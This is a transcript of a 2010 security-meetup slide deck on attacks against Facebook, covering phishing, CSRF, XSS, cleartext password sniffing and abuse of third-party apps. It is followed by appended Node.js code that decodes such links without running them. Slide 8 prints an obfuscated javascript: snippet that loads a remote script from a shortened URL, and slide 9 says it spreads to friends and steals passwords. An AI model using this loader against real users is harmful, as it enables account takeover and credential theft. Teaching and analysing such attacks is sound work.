Facebook Attacks



Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Facebook Attacks Presentation Transcript

  • 1. facebook attacks
  • 2.
    • Phishing
    • CSRF attack
    • JavaScript
    • XSS
  • 3. Facebook Phishing
  • 4. Facebook CSRF attack Third party app server
  • 5.  
  • 6.
    • There are many other attacks possible like
    • Brute forcing
    • Cookie stealing
    • Commercial Data mining
    • Database Reverse-Engineering
  • 7. Password Interception
    • The fact that the username and password were sent in clear text is a security vulnerability.
    • It is possible to read Facebook usernames and passwords off the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords as well as any additional accounts they use those passwords for.
    • Tabnabbing and CSRF have also gained popularity over the open platform.
    Current Facebook Precaution: Facebook currently takes no steps to protect user passwords in transit.
  • 8.
    • javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)
    • FREE!! CELLPHONE RECHARGE::..
    • This script is very commonly seen on Facebook, Orkut and many other social networking sites.
    • Analysing and Demo
  • 9.
    • What does it do?
    • It is sending messages to all my friends to recharge from account
    • It is adding comments in albums of my friends
    • It is creating threads in the communities I joined saying “Recharge this”; it is also adding some other communities to my list
    • Redirects you to the fake FB login page after 10-15 mins, stealing your password
    Source Script @ http://www.mediafire.com/?t2lagmvsvftww28
  • 10. http://www.facebook.com/profile.php?id=100000781542573 www.facebook.com/username
  • 11. The Facebook Platform
    • API – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs.
    • FBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to ColdFusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application.
    • FQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.
  • 12. How to add an application in Facebook
  • 13. How can this be Used For Exploiting?
    • You can Upload your own Application of any type.
    • So doesn’t this strike you as something of interest to a hacker?
  • 14. How can this be Used For Exploiting?
  • 15.  
  • 16. THANK YOU
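
The snippet on slide 8 hides the script URL behind percent-encoding and string concatenation. As an added example (not part of the original presentation), the following Node.js sketch shows how a defender could statically triage such a pasted `javascript:` URL without running it: decode it, fold the concatenated literals, and report a defanged script source. The function names, field names, verdict labels and the sample input (which uses a reserved `.test` domain) are constructed for illustration.

```javascript
// Added example: static triage of a pasted "javascript:" URL. Nothing is executed.
// Function names, field names and the verdict labels are hypothetical.

// Constructed sample with the same shape as the slide 8 snippet (reserved .test domain).
const SAMPLE = "javascript:d=document;c=d.createElement(%22script%22);" +
  "d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//exam%22+%22ple.%22+" +
  "%22test%22+%22/%22+%22x.js%22;void(0)";

// Percent-decode; on malformed escapes fall back to the raw text.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Merge adjacent string literals joined by "+" ("ht"+"tp:" becomes "http:").
// Literals containing backslash escapes are left alone.
function foldStringConcats(src) {
  const pair = /(["'])((?:(?!\1)[^\\])*)\1\s*\+\s*(["'])((?:(?!\3)[^\\])*)\3/;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, q1, a, q2, b) => JSON.stringify(a + b));
  } while (src !== prev);
  return src;
}

// Make a URL non-clickable for reports and tickets.
function defang(u) {
  return u.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

function analyzeJavascriptUrl(input) {
  const scheme = /^\s*javascript:/i.exec(input);
  if (!scheme) return { isJavascriptUrl: false };
  const folded = foldStringConcats(safeDecode(input.slice(scheme[0].length)));
  const createsScript = /createElement\(\s*(["'])script\1\s*\)/i.test(folded);
  const src = /\.src\s*=\s*(["'])((?:(?!\1)[^\\])*)\1/.exec(folded);
  const remote = src && /^(https?:)?\/\//i.test(src[2]) ? src[2] : null;
  return {
    isJavascriptUrl: true,
    createsScript,
    appendsToDom: /\.appendChild\(/.test(folded),
    remoteSrc: remote && defang(remote),
    verdict: createsScript && remote ? "remote-script-loader" : "needs-review",
  };
}

console.log(analyzeJavascriptUrl(SAMPLE));
```

A `remote-script-loader` verdict means the pasted text would pull code from another origin into the page the user is logged in to, which matches the behaviour listed on slide 9.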